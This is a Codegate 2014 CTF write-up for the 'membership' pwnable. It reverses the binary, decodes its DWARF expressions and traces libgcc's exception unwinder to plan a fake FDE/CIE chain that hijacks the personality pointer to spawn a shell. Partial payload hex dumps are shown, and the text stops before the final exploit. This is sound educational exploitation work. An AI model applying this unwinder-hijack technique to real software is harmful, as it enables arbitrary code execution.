[Codegate 2014] membership (800pt pwnable) write-up
This is a write-up for 800 point pwnable challenge called ‘membership’ from Codegate CTF 2014 Pre-qual round. PPP was the only solver for this challenge during the competition, so I have decided to do a write-up for the challenge. Enjoy. (awesie and ricky solved it during the competition.)
1. Challenge overview
You can download the copy of the binary here.
During the competition, we could ssh into one of their machines to exploit and read the flag.
1 2 |
$ file membership membership: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x0c19bb6578cf047d8f3150628d1d82d4a205ea1d, stripped |
As you can see, it’s a 32-bit ELF binary. So, let’s open it up in IDA and start reversing.
The program looks really simple. It just installs a couple signal handlers (specifically for SIGSEGV and SIGFPE) and calls a main (interesting) function, where it prompts us for the userid and password. Then, the program calculates SHA256 hash of the given password and compares with the stored hash. If the password hashes do not match, a runtime error exception is thrown and the program is aborted. If we pass in the correct password, we get a shell :)
Since guessing the correct password or cracking the hash is not viable option for us, we try to locate some other bugs that can be useful.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
int main() { int v0; // ebx@4 char v2; // [sp+18h] [bp-10h]@4 char v3; // [sp+1Fh] [bp-9h]@4 memset(&unk_804B120, 0, 0xB0u); write(1, "userid :: ", 0xAu); fgets(userid_buf, 16, stdin); write(1, "password :: ", 0xCu); fgets(password_buf, 16, stdin); SHA256_Init(&unk_804B120); SHA256_Update(&unk_804B120, password_buf, 15); SHA256_Final((int)my_pw_hash, (int)&unk_804B120); if ( strlen(password_buf) >= 0xF ) ::v0 = 0; // mov eax, 0 // mov dword ptr [eax], 0 if ( memcmp(my_pw_hash, pw_hash, 0x21u) ) { v0 = __cxa_allocate_exception(8); std::allocator<char>::allocator(&v3); std::string::string(&v2, "access denied", &v3); std::runtime_error::runtime_error(v0, &v2); std::string::~string(&v2); std::allocator<char>::~allocator(&v3); __cxa_throw(v0, &`typeinfo for'std::runtime_error, (const char *)&std::runtime_error::~runtime_error); } return execlp("/bin/sh", "/bin/sh", 0); } |
As highlighted above, the program dereferences a null pointer (*0 = 0) if the length of the password is greater than or equal to 16 bytes. Obviously it is going to trigger SIGSEGV, but do you remember what we said earlier about installing the signal handlers? And yes, one of them was SIGSEGV handler.
So, instead of crashing it miserably, the handler will be called.
Let’s examine what this handler does.

SIGSEGV handler installer
Now, if we look at the SIGSEGV_handler, we may think it doesn’t really do anything useful.
Note that it just fills up exception information and calls __cxa_throw to throw exception.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
void __noreturn SIGSEGV_handler() { int v0; // ebx@1 char v1; // [sp+18h] [bp-10h]@1 char v2; // [sp+1Fh] [bp-9h]@1 v0 = __cxa_allocate_exception(8); std::allocator<char>::allocator(&v2); std::string::string(&v1, "Segmentation fault", &v2); std::runtime_error::runtime_error(v0, &v1); std::string::~string(&v1); std::allocator<char>::~allocator(&v2); __cxa_throw(v0, &`typeinfo for'std::runtime_error, (const char *)&std::runtime_error::~runtime_error); } |
At this point, we could go on and explain what SIGFPE_handler does as well, but we’ll skip it since it’s not that interesting and is not needed for a successful exploitation.
You may ask… so, what’s left?
2. Vulnerability
Notice that this is a C++ program with exception throwing. We should check how C++ exception handling works.
It uses a thing called, DWARF, which is a standardized debugging data format for unwinding the stack and handling exceptions.
There was a CTF problem in the past that involved DWARF (called Khazad from Ghost in the Shellcode 2012): Check out these write-ups if you are interested!
- oxff’s write-up: http://blog.oxff.net/#k6jx7ewsq2bbid6giflq
- Eindbazen’s write-up: http://eindbazen.net/2012/01/gits-2012-finals-khazad-pwn600/
Anyways, you can find DWARF information can be displayed by using binutils such as objdump or readelf:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
$ readelf -w membership Contents of the .eh_frame section: 00000000 00000014 00000000 CIE Version: 1 Augmentation: "zR" Code alignment factor: 1 Data alignment factor: -4 Return address column: 8 Augmentation data: 1b DW_CFA_def_cfa: r4 (esp) ofs 4 DW_CFA_offset: r8 (eip) at cfa-4 DW_CFA_nop DW_CFA_nop ... (omitted) ... 0000010c 00000070 000000f8 FDE cie=00000018 pc=08048fa7..0804904d Augmentation data: 0c 98 04 08 DW_CFA_advance_loc: 1 to 08048fa8 DW_CFA_def_cfa_offset: 8 DW_CFA_offset: r5 (ebp) at cfa-8 DW_CFA_advance_loc: 2 to 08048faa DW_CFA_def_cfa_register: r5 (ebp) DW_CFA_advance_loc: 5 to 08048faf DW_CFA_offset: r6 (esi) at cfa-12 DW_CFA_offset: r3 (ebx) at cfa-16 DW_CFA_val_expression: r8 (eip) (DW_OP_addr: 804b1b0; DW_OP_deref; DW_OP_const4u: 50598931; DW_OP_const4u: 1616928864; DW_OP_plus; DW_OP_ne; DW_OP_bra: 50; DW_OP_addr: 804b1b4; DW_OP_deref; DW_OP_const4u: 84480008; DW_OP_const4u: 1616928864; DW_OP_plus; DW_OP_ne; DW_OP_bra: 29; DW_OP_addr: 804b1c1; DW_OP_deref; DW_OP_const4u: 8; DW_OP_shr; DW_OP_const4u: 4206257; DW_OP_ne; DW_OP_bra: 8; DW_OP_addr: 8048cbc; DW_OP_skip: 5; DW_OP_addr: 8048f18) DW_CFA_nop DW_CFA_nop DW_CFA_nop ... (omitted) ... |
Take a close look at the entry with “pc=08048fa7..0804904d”.
This entry basically describes what should happen when the exception is thrown between that PC range. Note that the SIGSEGV_handler throws an exception at
0x0804901A , which is in that range (that range is precisely SIGSEGV_handler function).
Ok. Now, we have to make sense of what all those operations mean :)
DW_CFA_val_expression contains CFA expressions that are defined here.
Luckily, it’s not that hard to understand the expressions. We can simply think of it as a stack machine:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
DW_OP_addr: 804b1b0 // push 0x804b1b0 (this is userid_buf) DW_OP_deref // dereference in-place DW_OP_const4u: 50598931 // push 50598931 DW_OP_const4u: 1616928864 // push 1616928864 DW_OP_plus // add => hex(50598931 + 1616928864)[2:].decode('hex') => 'cdts' DW_OP_ne // compare not equal DW_OP_bra: 50 // branch to END DW_OP_addr: 804b1b4 // push 0x804b1b4 (this is userid_buf+4) DW_OP_deref // dreference in-place DW_OP_const4u: 84480008 // push 84480008 DW_OP_const4u: 1616928864 // push 1616928864 DW_OP_plus // add => hex(8448008 + 1616928864)[2:].decode('hex') ==> 'eiph' DW_OP_ne // compare not equal DW_OP_bra: 29 // branch to END DW_OP_addr: 804b1c1 // push 0x804b1c1 (this is password_buf+1) DW_OP_deref // dereference in-place DW_OP_const4u: 8 // push 8 DW_OP_shr // shift right (*0x804b1c1 by 8) DW_OP_const4u: 4206257 // push 4206257 => 0x402eb1 DW_OP_ne // compare not equal DW_OP_bra: 8 // branch to END DW_OP_addr: 8048cbc // push 0x8048cbc DW_OP_skip: 5 // skip 5 DW_OP_addr: 8048f18 // push 0x8048f18 (this is END) |
So, in short, it checks if the username is “stdchpie” and the password[2:5] is equal to “\xb1\x2e\x40”.
If any of the condition fails, it transfers execution to
0x8048f18 , which does
exit(0) .
What happens if we satisfy the conditions? Good question.
It basically dumps us to the following code:
1 2 3 4 5 6 7 8 9 10 11 |
.text:08048CE8 mov [esp], eax .text:08048CEB call ___cxa_begin_catch .text:08048CF0 mov dword ptr [esp], offset aNested ; "nested" .text:08048CF7 call _puts .text:08048CFC mov eax, (offset password_buf+1) .text:08048D01 mov eax, [eax] .text:08048D03 mov edx, (offset password_buf+1) .text:08048D08 mov edx, [edx+4] .text:08048D0B mov [eax], edx .text:08048D0D call ___cxa_end_catch .text:08048D12 jmp short loc_8048CC0 |
This code prints out “nested” string and writes password[5:9] to *password[1:5]. Meaning, we get to write anything in 0x402eb1?? address space with any 4 byte value we choose. 4-byte write is pretty strong tool in exploitation, but when we are limited to 256 byte range, it’s difficult to make it useful. Also, it immediately jumps to 0x8048cc0 , where it does another null pointer dereference causing SIGSEGV to happen — thus, we get infinite ‘nested’ string printed out.
Alright. Let’s summarize what we know and have so far.
- We can trigger a null pointer dereference, causing SIGSEGV handler to get executed (and thus, DWARF CFA expressions), by sending a password that’s >= 16 bytes.
- With carefully constructed password, we can overwrite any 4-byte value to any address in between 0x402eb100 and 0x402eb1ff .
The natural question is, then, what is mapped on that memory address?
With
ulimit -s unlimited ,
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
(gdb) info proc map process 6207 Mapped address spaces: Start Addr End Addr Size Offset objfile 0x8048000 0x804a000 0x2000 0x0 /tmp/.ppp/membership 0x804a000 0x804b000 0x1000 0x1000 /tmp/.ppp/membership 0x804b000 0x804c000 0x1000 0x2000 /tmp/.ppp/membership 0x40000000 0x40020000 0x20000 0x0 /lib/i386-linux-gnu/ld-2.17.so ... (omitted) ... 0x402cf000 0x402ea000 0x1b000 0x0 /lib/i386-linux-gnu/libgcc_s.so.1 0x402ea000 0x402eb000 0x1000 0x1a000 /lib/i386-linux-gnu/libgcc_s.so.1 0x402eb000 0x402ec000 0x1000 0x1b000 /lib/i386-linux-gnu/libgcc_s.so.1 0x402ec000 0x4049a000 0x1ae000 0x0 /lib/i386-linux-gnu/libc-2.17.so 0x4049a000 0x4049c000 0x2000 0x1ae000 /lib/i386-linux-gnu/libc-2.17.so 0x4049c000 0x4049d000 0x1000 0x1b0000 /lib/i386-linux-gnu/libc-2.17.so 0x4049d000 0x404a0000 0x3000 0x0 0x404a0000 0x404a3000 0x3000 0x0 /lib/i386-linux-gnu/libdl-2.17.so ... (omitted) ... 0xbffdf000 0xc0000000 0x21000 0x0 [stack] |
As we can see above (highlighted), the address range falls into libgcc‘s memory — specifically, it matched portion of its .bss section.
So, what is there in libgcc_s.so.1, you ask.
Precisely, this.
And that’s it.
At this point, we downloaded and opened up libgcc source code to look at where some of these data structures are used, and tried to look for ways to get an EIP control.
So the journey begins.
3. libgcc source code analysis
Note that this step took the longest since we had to actually understand part of the gcc code when it does stack unwinding and handling the exception.
You can download the source for gcc here (gcc-4.8.1, Ubuntu 13.01).
During the competition, we chose each data structure of interest and traced backwards to find out whether by controlling said structure we can influence anything (e.g. function pointer) on callers while handling exceptions to hijack the control flow.
Since we now know which one can be used to control EIP, we will start from there: frame_hdr_cache_head is our target. [It is very well be possible to solve the challenge with different method/structure, but this is the one that we ended up using during the CTF.]
If we locate the place that frame_hdr_cache_head is referenced, we land in the middle of _Unwind_IteratePhdrCallback function in libgcc/unwind-dw2-fde.dip.c.
199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 |
... (omitted) ... /* Find data->pc in shared library cache. Set load_base, p_eh_frame_hdr and p_dynamic plus match from the cache and goto "Read .eh_frame_hdr header." below. */ struct frame_hdr_cache_element *cache_entry; for (cache_entry = frame_hdr_cache_head; cache_entry; cache_entry = cache_entry->link) { if (data->pc >= cache_entry->pc_low && data->pc < cache_entry->pc_high) { load_base = cache_entry->load_base; p_eh_frame_hdr = cache_entry->p_eh_frame_hdr; p_dynamic = cache_entry->p_dynamic; /* And move the entry we're using to the head. */ if (cache_entry != frame_hdr_cache_head) { prev_cache_entry->link = cache_entry->link; cache_entry->link = frame_hdr_cache_head; frame_hdr_cache_head = cache_entry; } goto found; } ... (omitted) ... |
The code iterates through the list and finds the entry for data->pc in cache. data->pc is the program counter of the frame we are trying to handle the exception for.
This cache is filled in as the program discovers exception handler frames (eh_frame).
The following is the struct definition for frame_hdr_cache_element:
1 2 3 4 5 6 7 8 9 |
static struct frame_hdr_cache_element { _Unwind_Ptr pc_low; _Unwind_Ptr pc_high; _Unwind_Ptr load_base; const ElfW(Phdr) *p_eh_frame_hdr; const ElfW(Phdr) *p_dynamic; struct frame_hdr_cache_element *link; } frame_hdr_cache[FRAME_HDR_CACHE_SIZE]; |
So, if we control where frame_hdr_cache_head points to, we can also construct/control the elements inside. Before we dive into what happens when we find an element in the cache and ‘goto found‘, let’s step back for a minute and see if we can even get to here and what that allows us to do.
The function we just looked at (_Unwind_IteratePhdrCallback) is called from _Unwind_Find_FDE in unwind-dw2-fde-dip.c.
Then, _Unwind_Find_FDE function is called from uw_frame_state_for function in unwind-dw2.c.
uw_frame_state_for function is called from _Unwind_RaiseException function in unwind.inc, which provides an interface to raise an exception given an exception object.
Where does _Unwind_RaiseException get called, then?
It gets called by __cxa_throw, and if you remember, our SIGSEGV_handler invokes this function to raise an exception.
Alright. We now have confirmed that we can get to that code by causing the binary to throw an exception and letting libgcc unwinds/handles the exception.
But is there anything interesting in this code path such that we can give us EIP control? Yes.
Let’s review _Unwind_RaiseException a little bit:
78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 |
... (omitted) ... /* Raise an exception, passing along the given exception object. */ _Unwind_Reason_Code LIBGCC2_UNWIND_ATTRIBUTE _Unwind_RaiseException(struct _Unwind_Exception *exc) { struct _Unwind_Context this_context, cur_context; _Unwind_Reason_Code code; /* Set up this_context to describe the current stack frame. */ uw_init_context (&this_context); cur_context = this_context; /* Phase 1: Search. Unwind the stack, calling the personality routine with the _UA_SEARCH_PHASE flag set. Do not modify the stack yet. */ while (1) { _Unwind_FrameState fs; /* Set up fs to describe the FDE for the caller of cur_context. The first time through the loop, that means __cxa_throw. */ code = uw_frame_state_for (&cur_context, &fs); if (code == _URC_END_OF_STACK) /* Hit end of stack with no handler found. */ return _URC_END_OF_STACK; if (code != _URC_NO_REASON) /* Some error encountered. Usually the unwinder doesn't diagnose these and merely crashes. */ return _URC_FATAL_PHASE1_ERROR; /* Unwind successful. Run the personality routine, if any. */ if (fs.personality) { code = (*fs.personality) (1, _UA_SEARCH_PHASE, exc->exception_class, exc, &cur_context); if (code == _URC_HANDLER_FOUND) break; else if (code != _URC_CONTINUE_UNWIND) return _URC_FATAL_PHASE1_ERROR; } /* Update cur_context to describe the same frame as fs. */ uw_update_context (&cur_context, &fs); } /* Indicate to _Unwind_Resume and associated subroutines that this is not a forced unwind. Further, note where we found a handler. */ exc->private_1 = 0; exc->private_2 = uw_identify_context (&cur_context); cur_context = this_context; code = _Unwind_RaiseException_Phase2 (exc, &cur_context); if (code != _URC_INSTALL_CONTEXT) return code; uw_install_context (&this_context, &cur_context); } ... (omitted) ... |
Notice the highlighted lines. What do you see?
A function pointer getting called! And we *may* be able to control
fs.personality .
Let’s find out!
1160 1161 1162 1163 1164 1165 1166 1167 1168 1169 1170 1171 1172 1173 1174 1175 1176 1177 1178 1179 1180 1181 1182 1183 1184 1185 1186 1187 1188 1189 1190 1191 1192 1193 1194 1195 1196 1197 1198 1199 1200 1201 1202 |
... (omitted) ... /* Given the _Unwind_Context CONTEXT for a stack frame, look up the FDE for its caller and decode it into FS. This function also sets the args_size and lsda members of CONTEXT, as they are really information about the caller's frame. */ static _Unwind_Reason_Code uw_frame_state_for (struct _Unwind_Context *context, _Unwind_FrameState *fs) { const struct dwarf_fde *fde; const struct dwarf_cie *cie; const unsigned char *aug, *insn, *end; memset (fs, 0, sizeof (*fs)); context->args_size = 0; context->lsda = 0; if (context->ra == 0) return _URC_END_OF_STACK; fde = _Unwind_Find_FDE (context->ra + _Unwind_IsSignalFrame (context) - 1, &context->bases); if (fde == NULL) { #ifdef MD_FALLBACK_FRAME_STATE_FOR /* Couldn't find frame unwind info for this function. Try a target-specific fallback mechanism. This will necessarily not provide a personality routine or LSDA. */ return MD_FALLBACK_FRAME_STATE_FOR (context, fs); #else return _URC_END_OF_STACK; #endif } fs->pc = context->bases.func; cie = get_cie (fde); insn = extract_cie_info (cie, context, fs); if (insn == NULL) /* CIE contained unknown augmentation. */ return _URC_FATAL_PHASE1_ERROR; ... (omitted) ... |
Remember that the struct pointer that we are interested in tracing is fs (aka 2nd argument).
Wee see here that _Unwind_Find_FDE is used to get fde (which is used to get cie), and extract_cie_info takes cie and fs as its first and third argument, respectively.
So, what happens in extract_cie_info?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
... (omitted) ... 378 /* Extract any interesting information from the CIE for the translation 379 unit F belongs to. Return a pointer to the byte after the augmentation, 380 or NULL if we encountered an undecipherable augmentation. */ 381 382 static const unsigned char * 383 extract_cie_info (const struct dwarf_cie *cie, struct _Unwind_Context *context, 384 _Unwind_FrameState *fs) 385 { 386 const unsigned char *aug = cie->augmentation; 387 const unsigned char *p = aug + strlen ((const char *)aug) + 1; 388 const unsigned char *ret = NULL; 389 _uleb128_t utmp; 390 _sleb128_t stmp; 391 392 /* g++ v2 "eh" has pointer immediately following augmentation string, 393 so it must be handled first. */ 394 if (aug[0] == 'e' && aug[1] == 'h') 395 { 396 fs->eh_ptr = read_pointer (p); 397 p += sizeof (void *); 398 aug += 2; 399 } ... (omitted) ... 454 /* "P" indicates a personality routine in the CIE augmentation. */ 455 else if (aug[0] == 'P') 456 { 457 _Unwind_Ptr personality; 458 459 p = read_encoded_value (context, *p, p + 1, &personality); 460 fs->personality = (_Unwind_Personality_Fn) personality; 461 aug += 1; 462 } ... (omitted) ... |
Cool.
extract_cie_info parses cie and updates
fs->personality . We’ll work out the details later.
Okay, now, we have to look into _Unwind_Find_FDE function to find out what it returns (fde) is:
459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 |
... (omitted) ... const fde * _Unwind_Find_FDE (void *pc, struct dwarf_eh_bases *bases) { struct unw_eh_callback_data data; const fde *ret; ret = _Unwind_Find_registered_FDE (pc, bases); if (ret != NULL) return ret; data.pc = (_Unwind_Ptr) pc; data.tbase = NULL; data.dbase = NULL; data.func = NULL; data.ret = NULL; data.check_cache = 1; if (dl_iterate_phdr (_Unwind_IteratePhdrCallback, &data) < 0) return NULL; if (data.ret) { bases->tbase = data.tbase; bases->dbase = data.dbase; bases->func = data.func; } return data.ret; } ... (omitted) ... |
As we discussed earlier, _Unwind_Find_FDE calls _Unwind_IteratePhdrCallback, which fills the data struct.
Then, it returns data.ret.
Whoa. After that chain of functions, we now came back to where we started — _Unwind_IteratePhdrCallback.
Warning: This is a really long function :p
To show a good idea of the call stack, here’s a diagram:
Fortunately, we do not have to look at all of its details. As we learned earlier, the cache for eh_frame_hdr is looked up and the following is performed in case the entry was found:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 |
... (omitted) ... 309 found: 310 311 if (!p_eh_frame_hdr) 312 return 0; 313 314 /* Read .eh_frame_hdr header. */ 315 hdr = (const struct unw_eh_frame_hdr *) 316 __RELOC_POINTER (p_eh_frame_hdr->p_vaddr, load_base); 317 if (hdr->version != 1) 318 return 1; 319 ... (omitted) ... 352 353 p = read_encoded_value_with_base (hdr->eh_frame_ptr_enc, 354 base_from_cb_data (hdr->eh_frame_ptr_enc, 355 data), 356 (const unsigned char *) (hdr + 1), 357 &eh_frame); 358 359 /* We require here specific table encoding to speed things up. 360 Also, DW_EH_PE_datarel here means using PT_GNU_EH_FRAME start 361 as base, not the processor specific DW_EH_PE_datarel. */ 362 if (hdr->fde_count_enc != DW_EH_PE_omit 363 && hdr->table_enc == (DW_EH_PE_datarel | DW_EH_PE_sdata4)) 364 { 365 _Unwind_Ptr fde_count; 366 367 p = read_encoded_value_with_base (hdr->fde_count_enc, 368 base_from_cb_data (hdr->fde_count_enc, 369 data), 370 p, &fde_count); 371 /* Shouldn't happen. */ 372 if (fde_count == 0) 373 return 1; 374 if ((((_Unwind_Ptr) p) & 3) == 0) 375 { 376 struct fde_table { 377 signed initial_loc __attribute__ ((mode (SI))); 378 signed fde __attribute__ ((mode (SI))); 379 }; 380 const struct fde_table *table = (const struct fde_table *) p; 381 size_t lo, hi, mid; 382 _Unwind_Ptr data_base = (_Unwind_Ptr) hdr; 383 fde *f; 384 unsigned int f_enc, f_enc_size; 385 _Unwind_Ptr range; 386 387 mid = fde_count - 1; 388 if (data->pc < table[0].initial_loc + data_base) 389 return 1; 390 else if (data->pc < table[mid].initial_loc + data_base) 391 { 392 lo = 0; 393 hi = mid; 394 395 while (lo < hi) 396 { 397 mid = (lo + hi) / 2; 398 if (data->pc < table[mid].initial_loc + data_base) 399 hi = mid; 400 else if (data->pc >= table[mid + 1].initial_loc + data_base) 401 lo = mid + 1; 402 else 403 break; 404 } 405 406 gcc_assert (lo < hi); 407 } 408 409 f = (fde *) (table[mid].fde + data_base); 410 f_enc = get_fde_encoding (f); 411 f_enc_size = size_of_encoded_value (f_enc); 412 read_encoded_value_with_base (f_enc & 0x0f, 0, 413 &f->pc_begin[f_enc_size], &range); 414 if (data->pc < table[mid].initial_loc + data_base + range) 415 data->ret = f; 416 data->func = (void *) (table[mid].initial_loc + data_base); 417 return 1; 418 } 419 } ... (omitted) ... |
Note that
data->ret is set to f on line 415, where f is a FDE pointer found by performing binary search.
Comments from unwind-dw2-fde.h briefly describes FDE & CIE lookup:
112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 |
/* Terminology: CIE - Common Information Element FDE - Frame Descriptor Element There is one per function, and it describes where the function code is located, and what the register lifetimes and stack layout are within the function. The data structures are defined in the DWARF specification, although not in a very readable way (see LITERATURE). Every time an exception is thrown, the code needs to locate the FDE for the current function, and starts to look for exception regions from that FDE. This works in a two-level search: a) in a linear search, find the shared image (i.e. DLL) containing the PC b) using the FDE table for that shared object, locate the FDE using binary search (which requires the sorting). */ |
Let’s review some of the primitive structs and functions that are used in above code to get a better understanding of what’s going on. We will make references to these as we explain the code later.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 |
static struct frame_hdr_cache_element { _Unwind_Ptr pc_low; _Unwind_Ptr pc_high; _Unwind_Ptr load_base; const ElfW(Phdr) *p_eh_frame_hdr; const ElfW(Phdr) *p_dynamic; struct frame_hdr_cache_element *link; } frame_hdr_cache[FRAME_HDR_CACHE_SIZE]; typedef struct { Elf32_Word p_type; /* Segment type */ Elf32_Off p_offset; /* Segment file offset */ Elf32_Addr p_vaddr; /* Segment virtual address */ Elf32_Addr p_paddr; /* Segment physical address */ Elf32_Word p_filesz; /* Segment size in file */ Elf32_Word p_memsz; /* Segment size in memory */ Elf32_Word p_flags; /* Segment flags */ Elf32_Word p_align; /* Segment alignment */ } Elf32_Phdr; struct unw_eh_frame_hdr { unsigned char version; unsigned char eh_frame_ptr_enc; unsigned char fde_count_enc; unsigned char table_enc; } struct dwarf_fde { uword length; sword CIE_delta; unsigned char pc_begin[]; } struct dwarf_cie { uword length; sword CIE_id; ubyte version; unsigned char augmentation[]; } struct fde_table { signed initial_loc __attribute__ ((mode (SI))); signed fde __attribute__ ((mode (SI))); } |
And, these are some functions that are used when parsing data:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
/* Load an encoded value from memory at P. The value is returned in VAL; The function returns P incremented past the value. BASE is as given by base_of_encoded_value for this encoding in the appropriate context. */ static const unsigned char * read_encoded_value_with_base (unsigned char encoding, _Unwind_Ptr base, const unsigned char *p, _Unwind_Ptr *val) /* Like read_encoded_value_with_base, but get the base from the context rather than providing it directly. */ static inline const unsigned char * read_encoded_value (struct _Unwind_Context *context, unsigned char encoding, const unsigned char *p, _Unwind_Ptr *val) /* Read an unsigned leb128 value from P, store the value in VAL, return P incremented past the value. We assume that a word is large enough to hold any value so encoded; if it is smaller than a pointer on some target, pointers should not be leb128 encoded on that target. */ static const unsigned char * read_uleb128 (const unsigned char *p, _uleb128_t *val) /* Given an encoding and an _Unwind_Context, return the base to which the encoding is relative. This base may then be passed to read_encoded_value_with_base for use when the _Unwind_Context is not available. */ static _Unwind_Ptr base_of_encoded_value (unsigned char encoding, struct _Unwind_Context *context) |
That was a lot of stuff, but don’t worry about understanding/remembering all of them since we will go over the logic at somewhat high-level.
When an exception is thrown, the PC is looked up to find a correct FDE for the current function.
- First, they search the shared library cache linked-list (which we control the head pointer).
- Once the entry is found, they get unw_eh_frame_hdr (hdr variable) by adding p_vaddr and load_base. Then, they make sure the version of hdr is 1.
- hdr also contains the flags for encoding schemes for eh_frame_ptr, fde_count, and table.
- Encoding flag is defined in unwind-pe.h, but important ones are: DW_EH_PE_pcrel (0x10, pc-relative), DW_EH_PE_absptr (0x00, absolute), DW_EH_PE_sdata4 (0x0b, signed 4 byte), DW_EH_PE_udata4 (0x03, unsigned 4 byte).
- Parse eh_frame and fde_count
- Perform binary search in table for the data->pc against table[i].initial_loc + data_base , where data_base is hdr.
- When found an element in table, set f to table[mid].fde + data_base (thus, calculating the FDE pointer).
- Final check is done by parsing the range to ensure that this FDE record covers data->pc
( table[mid].initial_loc + data_base <= data->pc < table[mid].initial_loc + data_base + range ) - data->ret is filled with f.
It’s important to carefully construct a (fake) FDE record since it holds CIE_delta field, which is used to locate the CIE record to be parsed later (for personality function pointer).
Only piece that we haven’t visited yet is extract_cie_info, but we will visit it as we develop an exploit payload :)
4. Exploit development
Finally, we can start writing some evil awesome payload to pwn this binary.
Here’s our plan for the attack:
- Overwrite frame_hdr_cache_head (0x402eb118) to point to our stdin buffer (0x40025000 + 0x1c for skipping userid/password/padding).
- Construct fake structs:
- cache_entry (frame_hdr_cache_element)
- p_eh_frame_hdr (Elf32_Phdr)
- hdr (unw_eh_frame_hdr)
- table (fde_table)
- fde (dwarf_fde)
- cie (dwarf_cide)
- When creating a fake cie struct, we make the personality function pointer 0x8048E97 , where it does execlp("/bin/sh", "/bin/sh", 0) , and get a shell!!
Note that the some of the fields in structs are relative offsets, so we need to plan where to put things and link them correctly.
4-1. Trigger
Let’s start with a simple payload that would pass the check and trigger the bug.
1 2 3 |
00000000 73 74 64 63 68 70 69 65 0a 41 01 b1 2e 40 41 41 |stdchpie.A...@AA| 00000010 41 41 41 41 41 41 41 41 41 |AAAAAAAAA| 00000019 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
(gdb) r < payload Starting program: /tmp/.ppp/./membership < trigger userid :: password :: Program received signal SIGSEGV, Segmentation fault. 0x08048e01 in ?? () (gdb) c Continuing. nested Program received signal SIGSEGV, Segmentation fault. 0x08048cc5 in ?? () (gdb) c Continuing. nested Program received signal SIGSEGV, Segmentation fault. 0x08048cc5 in ?? () (gdb) x/wx 0x402eb101 0x402eb101: 0x41414141 |
We currently chose 0x402eb101 for no particular reason, but we can see that memory is successfully written.
4-2. cache_entry & p_eh_frame_hdr construction
Now, we overwrite frame_hdr_cache_head to point to our stdin buffer.
We are going to start building fake structs from our buffer + 0x1c.
So what values should we use?
To not worry about the search too much, we are going to set pc_low to 0x0 and pc_high to 0xFFFFFFFF. This basically says that this cache entry should be used for any exception thrown in this range of addresses — so we’ll catch everything. Also, to make it easy to do math, we are going to make load_base to 0. Finally, we have to set p_eh_frame_hdr pointer to the fake Elf32_Phdr struct. We will put this fake phdr struct right after our fake cache_entry struct that we are currently building. The rest of the fields are not really used (for our purpose), so we can put dummy values.
This gives us this:
1 2 3 4 5 6 7 |
*frame_hdr_cache_head: | pc_low = 0x00000000 | pc_high = 0xFFFFFFFF | load_base = 0x00000000 | p_eh_frame_hdr = 0x40025034 | p_dynamic = 0x43434343 | link = 0x00000000 |
For p_eh_frame_hdr struct, we only care about p_vaddr which is used to calculate hdr (unw_eh_frame_hdr).
1 2 3 4 5 6 7 8 9 |
*p_eh_frame_hdr: | p_type = 0x6474e550 | p_offset = 0x44444444 | p_vaddr = 0x40025054 | p_paddr = 0x45454545 | p_filesz = 0x46464646 | p_memsz = 0x47474747 | p_flags = 0x48484848 | p_align = 0x49494949 |
Let’s see in action.
1 2 3 4 5 6 |
00000000 73 74 64 63 68 70 69 65 0a 41 18 b1 2e 40 1c 50 |[email protected]| 00000010 02 40 41 41 41 41 41 42 41 42 42 42 00 00 00 00 |.@AAAAABABBB....| 00000020 ff ff ff ff 00 00 00 00 34 50 02 40 43 43 43 43 |........4P.@CCCC| 00000030 00 00 00 00 50 e5 74 64 44 44 44 44 54 50 02 40 |....P.tdDDDDTP.@| 00000040 45 45 45 45 46 46 46 46 47 47 47 47 48 48 48 48 |EEEEFFFFGGGGHHHH| 00000050 49 49 49 49 |IIII| |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
